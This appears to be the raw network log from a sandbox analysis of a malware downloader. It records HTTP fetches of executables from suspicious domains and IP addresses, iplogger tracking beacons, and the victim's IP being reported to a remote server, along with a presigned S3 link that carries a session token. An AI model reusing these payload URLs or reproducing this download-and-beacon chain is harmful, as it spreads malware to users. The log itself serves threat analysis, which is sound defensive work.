Network Analysis

GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sat, 23 Dec 2023 09:23:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive memory: 0.429046630859375 expires: Sat, 23 Dec 2023 09:23:00 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Sat, 23 Dec 2023 08:57:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A2rYda57MR%2B4sh476e9oR1gbCbMQpwWKqwuZK%2F0qtdNG9uxAvAboiIt88CPkgD8JTWK%2FhUVSjOLbt%2FW56W5oW05k8ZG9Z%2F2xwtLicS%2B2%2FOmCS3Y5GekKOSQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839f8b14a94e5281-LAX alt-svc: h3=":443"; ma=86400

GET /raw/E0rY26ni HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sat, 23 Dec 2023 09:23:00 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Sat, 23 Dec 2023 09:23:00 GMT Server: cloudflare CF-RAY: 839f8b14b9577ea2-LAX

GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1 Host: flyawayaero.net Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect Date: Sat, 23 Dec 2023 09:23:01 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Location: https://potatogoose.com/8c35a460636521ed0deef49f6749c0e3/baf14778c246e15550645e30ba78ce1c.exe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eKl601GpTNDhs8VbhuFcFo%2FsBCETt0B61FGO8KStSnpBtXK7pwoPNj1vfP5TUgh7GAwGQMUU%2FjP1yRpQgrpli3aMJJYn11xrPyhSfYhGSbCPqYf75oyhHrh%2FfStu1SKjrv0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839f8b1aba292b9b-LAX alt-svc: h3=":443"; ma=86400

GET /1gDcm4 HTTP/1.1 Host: iplogger.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sat, 23 Dec 2023 09:23:01 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive set-cookie: 513639582949678744=3; expires=Mon, 23 Dec 2024 09:23:01 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict set-cookie: clhf03028ja=175.208.134.152; expires=Mon, 23 Dec 2024 09:23:01 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict memory: 0.420074462890625 expires: Sat, 23 Dec 2023 09:23:01 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JR6fkA4PwmNe9MZVMFJ3KXMk22lsv7AqmAeUWR4c9ckXOBika95mMAu%2BWv27ptOhFJlwaLL9XeNlwWNXOJ51HCiIg73v9bb%2Fmo6ezQ274VP6Y7gYLYPAfxqhLX%2FSUDw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839f8b1ac87d5233-LAX alt-svc: h3=":443"; ma=86400

GET /2cba948feb9c53fce4409f0079aec61c.exe HTTP/1.1 Host: randomdomainname.org Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect Date: Sat, 23 Dec 2023 09:23:01 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Location: https://budgienation.net/8c35a460636521ed0deef49f6749c0e3/2cba948feb9c53fce4409f0079aec61c.exe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NRwhNYjVKFOaQSzx4uskKMRX%2BROScWIRWMulusYRQ47buyjug%2FyDz2wEen7hsF8PZHA8vsiYqsj%2BGr3RgCeH6rv8yy2uzVmmyyQphi53b1GXOb2JH6uQo1%2F9JA9arCsCRmvAPmxvrA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839f8b1adbde2b77-LAX alt-svc: h3=":443"; ma=86400

GET /micaorrsoft/update/downloads/a01.exe HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive

HTTP/1.1 302 Found server: envoy x-usage-quota-remaining: 998507.370 vary: Accept-Language, Origin x-usage-request-cost: 1528.20 cache-control: max-age=0, no-cache, no-store, must-revalidate, private Content-Type: text/html; charset=utf-8 x-b3-traceid: 49339a147e1fb6bd x-usage-output-ops: 0 x-used-mesh: False x-dc-location: Micros-3 content-security-policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net app.pendo.io data.pendo.io pendo-static-6266914010103808.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; object-src 'none'; base-uri 'self'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ app.pendo.io cdn.pendo.io pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Date: Sat, 23 Dec 2023 09:23:01 GMT x-usage-user-time: 0.045846 x-usage-system-time: 0.000000 location: https://bbuseruploads.s3.amazonaws.com/c653674a-68fa-46c6-b413-9e71a0a3be60/downloads/7cc5bf80-2f20-4024-8172-c47af249efe9/a01.exe?response-content-disposition=attachment%3B%20filename%3D%22a01.exe%22&AWSAccessKeyId=ASIA6KOSE3BNLFZPBG6X&Signature=k4eYmK01rl8PGp4sOTTE04lteD0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjELr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDzQD%2B3UL8xV1DvAUP2KA45yti0HItkJ7%2FZj%2BYPZQQy%2BAIgK%2BOaDvdrjmeM3oRZP0OlFI2Pl%2B7GauL9ExmwyykyfrwqpwIIQhAAGgw5ODQ1MjUxMDExNDYiDOob2cJxt3Exs6kaAiqEAh4UYnRFarCTXYvHT0WXfJIgVuJuVvzUOPIbUG1w3nq2Yphc6rTsOhGwJcQzKyRWF%2BFm10oe88IpTj4lNM0gXnjCTwZXQVKi1Uz9JNwgbaaYzUofoIP2CZjnvaRuOYs0d6gOPdtnykb2eWeS2dGifaFBhMq%2BTovxD1l5xXeH3tHvHNOaHU%2F7ARV55Dc9YfRvdX2zOOUhEp62CjCviT3FBfq3tK8eLfJ2mwSddoM%2FvxLRaudgcAE%2FiTTi0RrZN5feEmr54GKsqEohzoLCOWAVpxR0dUkQrUDuJVTdHHFSkuX%2FWnX7mWGXITM985Y282tuaPXm6LdfM5BRgxr0vV3YWCtcSJnXMLjKmqwGOp0B5x1g24OisxHRKZUaNxp9%2BSGjgOsFU3J%2Fbs39LZmb4y%2BP29AtY729%2BALyUGmbQ3ghX9X%2FHvfZiW7jkSIo533BZtqI2LeUKLMZGFRSS862V%2FwPY7aL9mQD2m03u7eiKl8%2BE2Kc5rYFMkJjjg%2BliR6dKkTaba%2FDuj%2FNE2de8W4Y9dFnibQCoicKOX5nhXD%2B3R8dFgBbmLV9RQDHhvlDPg%3D%3D&Expires=1703324736 expires: Sat, 23 Dec 2023 09:23:01 GMT x-served-by: 7c7f1116bd68 x-envoy-upstream-service-time: 140 content-language: en x-view-name: bitbucket.apps.downloads.views.download_file x-b3-spanid: 49339a147e1fb6bd x-static-version: a44564505899 x-render-time: 0.11606287956237793 Connection: keep-alive x-usage-input-ops: 0 x-version: a44564505899 x-request-count: 739 x-frame-options: SAMEORIGIN X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache" Content-Length: 0

GET /8c35a460636521ed0deef49f6749c0e3/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1 Host: potatogoose.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sat, 23 Dec 2023 09:23:02 GMT Content-Type: application/x-ms-dos-executable Content-Length: 4454800 Connection: keep-alive Last-Modified: Sat, 23 Dec 2023 07:24:52 GMT Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TjFeYJWZzZiVjew8Ml7SP28CLCIa8Bnd%2BKfLMqUp3%2FXLe6vaGiJHvs5N2Nm2%2B0TuDGCshcwMvpu9wr%2BA8DBYgq70pfY7Pf6eFqKnFeVrWClsGZwH5i0o3lrqGARUzlOHwyc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839f8b2059c40cd7-LAX alt-svc: h3=":443"; ma=86400

GET /8c35a460636521ed0deef49f6749c0e3/2cba948feb9c53fce4409f0079aec61c.exe HTTP/1.1 Host: budgienation.net Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sat, 23 Dec 2023 09:23:02 GMT Content-Type: application/x-ms-dos-executable Content-Length: 4454776 Connection: keep-alive Last-Modified: Sat, 23 Dec 2023 07:27:35 GMT Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=azipE%2BVmB2fZhCMJvIxEjc6yKtUMhMC6Sy2plx5yGS3KRaoEHP9IcvDP2o%2FDIReVHfZh%2BVRMFJZoT6dZ8coMCigZlz%2Br5YuWY1PN2p0CgGBJtEgQNWP7qFUyQOTmYOAu%2FzcB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839f8b207e5d2acd-LAX alt-svc: h3=":443"; ma=86400

GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1 Host: net.geo.opera.com Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Sat, 23 Dec 2023 09:23:02 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive Content-Disposition: attachment; filename=OperaSetup.exe ETag: "598bcf7d8eeb46011593bb6729e142f8" Strict-Transport-Security: max-age=31536000; includeSubDomains

GET /c653674a-68fa-46c6-b413-9e71a0a3be60/downloads/7cc5bf80-2f20-4024-8172-c47af249efe9/a01.exe?response-content-disposition=attachment%3B%20filename%3D%22a01.exe%22&AWSAccessKeyId=ASIA6KOSE3BNLFZPBG6X&Signature=k4eYmK01rl8PGp4sOTTE04lteD0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjELr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDzQD%2B3UL8xV1DvAUP2KA45yti0HItkJ7%2FZj%2BYPZQQy%2BAIgK%2BOaDvdrjmeM3oRZP0OlFI2Pl%2B7GauL9ExmwyykyfrwqpwIIQhAAGgw5ODQ1MjUxMDExNDYiDOob2cJxt3Exs6kaAiqEAh4UYnRFarCTXYvHT0WXfJIgVuJuVvzUOPIbUG1w3nq2Yphc6rTsOhGwJcQzKyRWF%2BFm10oe88IpTj4lNM0gXnjCTwZXQVKi1Uz9JNwgbaaYzUofoIP2CZjnvaRuOYs0d6gOPdtnykb2eWeS2dGifaFBhMq%2BTovxD1l5xXeH3tHvHNOaHU%2F7ARV55Dc9YfRvdX2zOOUhEp62CjCviT3FBfq3tK8eLfJ2mwSddoM%2FvxLRaudgcAE%2FiTTi0RrZN5feEmr54GKsqEohzoLCOWAVpxR0dUkQrUDuJVTdHHFSkuX%2FWnX7mWGXITM985Y282tuaPXm6LdfM5BRgxr0vV3YWCtcSJnXMLjKmqwGOp0B5x1g24OisxHRKZUaNxp9%2BSGjgOsFU3J%2Fbs39LZmb4y%2BP29AtY729%2BALyUGmbQ3ghX9X%2FHvfZiW7jkSIo533BZtqI2LeUKLMZGFRSS862V%2FwPY7aL9mQD2m03u7eiKl8%2BE2Kc5rYFMkJjjg%2BliR6dKkTaba%2FDuj%2FNE2de8W4Y9dFnibQCoicKOX5nhXD%2B3R8dFgBbmLV9RQDHhvlDPg%3D%3D&Expires=1703324736 HTTP/1.1 Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive

HTTP/1.1 200 OK x-amz-id-2: dbCKR7w5pMnATunq4IGUPXw7uu28nVDAU6qR8Ezl7oo5d+2YmZHb0bKyhisP02hQc9vrHzC3XBz2wWODAuQrEF7Zhx9QY3WbaxqbU2xHdbo= x-amz-request-id: 2BA4WYR16F7XGMMM Date: Sat, 23 Dec 2023 09:23:03 GMT Last-Modified: Mon, 18 Dec 2023 07:35:18 GMT ETag: "faf0d1a297e74fed509e1c473b3d2a06" x-amz-server-side-encryption: AES256 x-amz-version-id: aeGlYP2S3eXJuEPZ23a6bRfymX4MkQfY Content-Disposition: attachment; filename="a01.exe" Accept-Ranges: bytes Content-Type: application/x-msdownload Server: AmazonS3 Content-Length: 761344

GET /19hVA4 HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: iplogger.com Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Sat, 23 Dec 2023 09:23:24 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive set-cookie: 513216202949678744=3; expires=Mon, 23 Dec 2024 09:23:24 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict set-cookie: clhf03028ja=175.208.134.152; expires=Mon, 23 Dec 2024 09:23:24 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict memory: 0.41280364990234375 expires: Sat, 23 Dec 2023 09:23:24 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hl6DjR8poq1QAiJopVC4iHHu%2BELTShjKPqkw0TzVCj63fyGRcq%2B9uP5bHbw0vbVaknAg%2BzT3CZ3U1DFIrcMzhj9KJDkozAaRLZf5HZwRVN3O8HCpdNNgcPDbZLwdH2s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839f8bac5b461007-LAX alt-svc: h3=":443"; ma=86400

GET /s/twty.exe HTTP/1.1 Host: 47.236.140.86 Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Sat, 23 Dec 2023 09:23:00 GMT Content-Type: application/octet-stream Content-Length: 4544398 Last-Modified: Mon, 18 Dec 2023 12:38:23 GMT Connection: keep-alive ETag: "65803d3f-45578e" Accept-Ranges: bytes

GET /InstallSetup3.exe HTTP/1.1 Host: 5.42.64.35 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sat, 23 Dec 2023 09:23:00 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 21 Dec 2023 15:49:49 GMT ETag: "23dacf-60d070caf2140" Accept-Ranges: bytes Content-Length: 2349775 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program

GET /downloads/toolspub4.exe HTTP/1.1 Host: galandskiyher5.com Connection: Keep-Alive

HTTP/1.1 200 OK server: nginx/1.20.2 date: Sat, 23 Dec 2023 09:23:00 GMT content-type: application/x-msdos-program content-length: 0 last-modified: Sat, 23 Dec 2023 09:22:01 GMT etag: "0-60d29dd801ad0" accept-ranges: bytes

GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1 Host: net.geo.opera.com Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently Server: nginx Date: Sat, 23 Dec 2023 09:23:01 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767

GET /?format=wet HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: api.ipify.org Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Sat, 23 Dec 2023 09:23:11 GMT Content-Type: text/plain Content-Length: 15 Connection: keep-alive Vary: Origin

GET /scripts/plus.php?ip=175.208.134.152&substr=three&s=ab HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: 91.92.254.7 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Sat, 23 Dec 2023 09:23:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /syncUpd.exe HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: 5.42.64.35 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Sat, 23 Dec 2023 09:23:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Sat, 23 Dec 2023 09:15:01 GMT ETag: "55600-60d29c4829e32" Accept-Ranges: bytes Content-Length: 349696 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program